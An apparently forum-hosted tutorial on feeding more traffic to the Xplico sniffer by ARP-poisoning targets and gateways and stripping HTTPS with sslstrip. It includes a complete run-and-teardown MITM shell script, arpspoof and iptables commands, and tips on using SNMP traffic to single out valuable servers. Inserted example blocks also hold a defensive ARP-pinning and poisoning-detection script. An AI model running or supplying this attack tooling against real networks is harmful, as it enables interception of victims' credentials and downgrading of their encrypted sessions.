Xplico: Making it more effective.


Honestly, there isn't a lot below. Quick summary: enabling ARP spoofing and sslstrip turns up the heat on Xplico-based sniffing.

Now that you have a basic understanding of Xplico, and have possibly read my previous tutorials, it's time to combine some attacks.

If you have a stand-alone box running only Xplico, and it isn't an inline bridge, hanging off a SPAN (mirror) port, or behind a TAP, then you are only receiving the local machine's traffic, and that just isn't enough.

To change that you can force traffic through your host with ARP spoofing. Other methods, such as DNS spoofing, work too, but they aren't covered below. The reason for concentrating on ARP is, quite honestly, the unfortunate lack of switch-based security (Dynamic ARP Inspection, port security) on internal networks, or of any sort of ARP monitoring software for that matter. It's all too easy to ARP spoof (or overflow a CAM table with MAC flooding) for fun, mischief, and security-related purposes.

As much as I hate to recommend it to admins, this is the reason you should hard-code MAC addresses (static ARP entries) for your *important* devices as well as the primary gateway. ARP floods ARE effective, but a host holding a static entry never has to ask "Who has x.x.x.x?" and won't accept a gratuitous ARP for that address, which is an easy enough way to thwart them. Unfortunately this comes at a cost: when a device is replaced, network issues immediately follow, because the stale static entries are COMMONLY overlooked (yes, YOU, network admins). It's also not an option for some large organizations, because many "newer" clustering and failover protocols use gratuitous ARP (GARP) to announce the active member to the switches and hosts on the segment.
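A worked example of the pinning advice above, added here and not taken from the original tutorial: a small POSIX sh script that installs a permanent neighbour entry for the gateway with iproute2 (a PERMANENT entry is never overwritten by received ARP replies, gratuitous or not), plus a check that reads `ip neigh show` output and tells a poisoned, or silently swapped, gateway MAC apart from a correctly pinned one. The interface, addresses and MACs below are made up, and the two sample neighbour-table lines are constructed.

```sh
#!/bin/sh
# Added example, not from the original tutorial. Requires iproute2; pinning
# needs root, checking does not. Interface/addresses/MACs are placeholders.

# pin_gateway IFACE IP MAC: install (or replace) a permanent ARP entry.
# With DRY_RUN=1 the command is printed instead of executed.
pin_gateway() {
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf 'ip neigh replace %s lladdr %s dev %s nud permanent\n' "$2" "$3" "$1"
    else
        ip neigh replace "$2" lladdr "$3" dev "$1" nud permanent
    fi
}

# check_gateway IP MAC < 'ip neigh show' output
# Exit status: 0 = entry present, MAC matches, state PERMANENT
#              1 = entry resolves to a different MAC (poisoned, or the
#                  gateway hardware was replaced and the pin is now wrong)
#              2 = no entry for IP, or entry exists but is not PERMANENT
check_gateway() {
    awk -v ip="$1" -v mac="$2" '
        $1 == ip {
            found = 1
            for (i = 2; i <= NF; i++) if ($i == "lladdr") have = tolower($(i+1))
            perm = ($NF == "PERMANENT")
        }
        END {
            if (!found) { print "no neighbour entry for " ip; exit 2 }
            if (have != tolower(mac)) {
                print "gateway " ip " resolves to " have ", expected " mac; exit 1
            }
            if (!perm) { print "gateway " ip " MAC ok but entry is not PERMANENT"; exit 2 }
            print "gateway " ip " pinned to " have; exit 0
        }'
}

# Constructed samples of 'ip neigh show' output. The second line is what a
# successful poisoning of an unpinned host looks like: the gateway IP now
# maps to the attacker's MAC.
SAMPLE_OK='10.0.0.1 dev eth0 lladdr 00:11:22:33:44:55 PERMANENT'
SAMPLE_POISONED='10.0.0.1 dev eth0 lladdr de:ad:be:ef:00:07 REACHABLE'

if [ "${1:-}" = demo ]; then
    printf '%s\n' "$SAMPLE_OK" | check_gateway 10.0.0.1 00:11:22:33:44:55
    printf '%s\n' "$SAMPLE_POISONED" | check_gateway 10.0.0.1 00:11:22:33:44:55
fi
```

Run it as `sh pin.sh demo` to see both verdicts on the constructed samples; in production feed it `ip neigh show | check_gateway <gw-ip> <gw-mac>` from cron and alert on any non-zero status. A status of 1 after a hardware swap is the exact "network issues immediately follow" failure described above, which is why the check reports the MAC it actually saw.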

If you don't understand ARP, I highly recommend you look over the following pages; for networking in general it's important that you understand ARP.

2. http://wiki.wireshark.org/Gratuitous_ARP

Given the above, let's build on my previous tutorial, Sniffing Various Passwords: https://soldierx.com/tutorials/Sniffing-Various-Passwords-MITM-DSNIFF-an...

Enable ARP spoofing:

#echo 1 > /proc/sys/net/ipv4/ip_forward

#arpspoof -i <iface> -t <target> <gateway> >/dev/null 2>&1 &

The first line turns on IP forwarding so the traffic you attract is relayed rather than dropped (without it you simply black-hole the target). The arpspoof line tells <target> that your MAC address belongs to <gateway>; backgrounding it with its output discarded keeps the terminal free for the next step. If you also want the return traffic, run a second instance with the two addresses swapped (-t <gateway> <target>).

Rant and note: focusing your attack is VERY important. For most sniffing you want the traffic destined for the default gateway (outbound network traffic); sometimes, however, you will need to attack individual targets (authentication servers, web proxies, storage systems, or other important systems).

Curiously enough, SNMP is a giant pointer in most large companies: in practice only the important servers (in a very small percentage of networks, all servers) are monitored by SNMP. Sniffing SNMP traffic is a quick way to focus your efforts during internal network pwnage if your goal is not end-user data. Monitored systems generally hold the "goods" or fill important roles (important enough to monitor, right?). Even with SNMPv3, where you may not be able to read the contents, the traffic is still a giant arrow pointing at servers rather than end-user machines. To summarize: if it's sending or receiving SNMP traffic, it's typically worth targeting.

To add insult to injury, if your routing tables are pushed out with dynamic routing updates (RIP, OSPF and friends), then you have also helped potential attackers map out your internal goodies. Think carefully before you choose ANY "automated" function to reduce networking work.
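Added example (not part of the original tutorial) that turns the SNMP observation two paragraphs up into a triage step: a shell function that reads `tcpdump -nn` output and lists the hosts being polled on UDP 161 or sending traps to UDP 162, which are the monitored systems, while the NMS itself drops out because it is only ever the poller or the trap sink. SNMPv3 talkers are flagged on the assumption that tcpdump prints an `F=` flags field for v3 messages; check that against your own capture before relying on it. The capture lines embedded below are constructed, not from a real network.

```sh
#!/bin/sh
# Added example, not from the original tutorial. Reads 'tcpdump -nn' text
# (e.g. tcpdump -nn -r capture.pcap 'udp port 161 or udp port 162') on stdin.

# snmp_targets < tcpdump-output
# Prints one line per SNMP-managed host:  <host> polls=<n> traps=<n> v3=<yes|no>
# sorted by poll count, most-polled first. A host counts as managed when it
# is the destination of UDP 161 traffic (being polled) or the source of
# UDP 162 traffic (sending traps).
snmp_targets() {
    awk '
        $2 == "IP" && $4 == ">" {
            src = $3; dst = $5; sub(/:$/, "", dst)
            # tcpdump prints host.port; split on the last dot
            sh = src; sub(/\.[0-9]+$/, "", sh)
            dp = dst; sub(/.*\./, "", dp)
            dh = dst; sub(/\.[0-9]+$/, "", dh)
            if (dp == 161) {
                polls[dh]++
                # ASSUMPTION: tcpdump marks SNMPv3 messages with an "F=" flags field
                if ($0 ~ / F=/) v3[dh] = 1
            } else if (dp == 162) {
                traps[sh]++
            }
        }
        END {
            for (h in polls) seen[h] = 1
            for (h in traps) seen[h] = 1
            for (h in seen)
                printf "%s polls=%d traps=%d v3=%s\n", h, polls[h]+0, traps[h]+0, ((h in v3) ? "yes" : "no")
        }' | sort -t= -k2,2nr
}

# Constructed sample capture: 10.0.0.50 is the NMS, .20 is polled with v1/v2c,
# .21 with v3, .22 only sends traps, .99 is an end user browsing the web.
SAMPLE_CAPTURE='12:00:01.000001 IP 10.0.0.50.51234 > 10.0.0.20.161: C="public" GetRequest(28) .1.3.6.1.2.1.1.3.0
12:00:01.000200 IP 10.0.0.20.161 > 10.0.0.50.51234: C="public" GetResponse(32) .1.3.6.1.2.1.1.3.0=12345
12:00:02.000001 IP 10.0.0.50.51235 > 10.0.0.20.161: C="public" GetRequest(28) .1.3.6.1.2.1.25.1.1.0
12:00:03.000001 IP 10.0.0.50.51236 > 10.0.0.21.161: F=apr U=nms [!scoped PDU]
12:00:04.000001 IP 10.0.0.22.40000 > 10.0.0.50.162: C="public" V2Trap(60) .1.3.6.1.6.3.1.1.5.3
12:00:05.000001 IP 10.0.0.99.52000 > 93.184.216.34.443: Flags [S], seq 1, win 64240, length 0'

if [ "${1:-}" = demo ]; then
    printf '%s\n' "$SAMPLE_CAPTURE" | snmp_targets
fi
```

`sh snmp_targets.sh demo` prints the three managed hosts and nothing for the NMS or the end user; in the field, pipe a live `tcpdump -nn -l` into `snmp_targets` after a few polling cycles and start with the top of the list.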

Remove SSL protection:

#sslstrip -a -w encrypted.txt

Note that sslstrip only sees connections that reach its listening port (TCP 10000 by default), so the port 80 traffic you are now forwarding has to be redirected to that port with an iptables NAT rule; without the redirect nothing gets stripped. It also only works on sessions that start over plain HTTP and link to HTTPS; a connection the browser opens as HTTPS from the start is not touched.

At this point your victims' HTTPS links are being downgraded and logged to encrypted.txt, Xplico is ingesting the rest of the traffic, and ARP spoofing is forcing the other systems' traffic through your host.
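The whole procedure as one script, added here as an example and not taken from the original tutorial or from the dsniff/sslstrip projects: it enables forwarding, adds the NAT redirect that hands port-80 connections to sslstrip, poisons both the target and the gateway so return traffic also transits your host, and tears everything down again on exit (arpspoof re-ARPs the victims when it gets SIGINT, which is the part people forget). It assumes dsniff's arpspoof and sslstrip are installed and that you run it as root; the interface and addresses are placeholders you pass on the command line, and `show` prints the commands without running anything.

```sh
#!/bin/sh
# Added example, not from the original tutorial.
# Usage:  sh mitm.sh show <iface> <target-ip> <gateway-ip>   # print the commands
#         sh mitm.sh run  <iface> <target-ip> <gateway-ip>   # run them (root)

PORT=10000              # sslstrip's default listening port
LOGFILE=encrypted.txt   # where sslstrip writes what it captured

# valid_ipv4 ADDR: succeed only for a dotted quad with every octet in 0-255.
valid_ipv4() {
    case "$1" in
        ""|.*|*.|*..*|*[!0-9.]*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do [ "$o" -le 255 ] || return 1; done
}

# mitm_commands IFACE TARGET GATEWAY: print the exact commands, one per line.
mitm_commands() {
    iface=$1; target=$2; gw=$3
    valid_ipv4 "$target" && valid_ipv4 "$gw" || { echo "bad address: $target / $gw" >&2; return 2; }
    [ "$target" != "$gw" ] || { echo "target and gateway must differ" >&2; return 2; }
    cat <<EOF
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i $iface -p tcp --dport 80 -j REDIRECT --to-ports $PORT
arpspoof -i $iface -t $target $gw >/dev/null 2>&1 &
arpspoof -i $iface -t $gw $target >/dev/null 2>&1 &
sslstrip -a -l $PORT -w $LOGFILE
EOF
}

# cleanup_commands IFACE: SIGINT makes arpspoof restore the real ARP entries;
# then drop the redirect and stop forwarding so the box stops relaying traffic.
cleanup_commands() {
    cat <<EOF
pkill -INT -x arpspoof
iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-ports $PORT
echo 0 > /proc/sys/net/ipv4/ip_forward
EOF
}

# mitm_run IFACE TARGET GATEWAY: execute the commands; Ctrl-C tears down.
mitm_run() {
    cmds=$(mitm_commands "$@") || return $?
    trap "cleanup_commands '$1' | sh; trap - INT TERM EXIT" INT TERM EXIT
    printf '%s\n' "$cmds" | sh
}

case "${1:-}" in
    show) shift; mitm_commands "$@" ;;
    run)  shift; mitm_run "$@" ;;
esac
```

Point Xplico at the same interface while this runs. If you skip the cleanup, the target keeps pointing at your MAC until its ARP cache expires, and the iptables rule keeps redirecting port 80 into a listener that is no longer there, which is a very noticeable outage.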

Building from there, take for example one of numb's tutorials (http://soldierx.com/tutorials/Penetrating-Secure-Websites-Increasing-Att...)

Using DNS enumeration techniques combined with host mapping is another way to widen your attack surface. Once you have identified more resources, you can tailor the attack to fit your needs.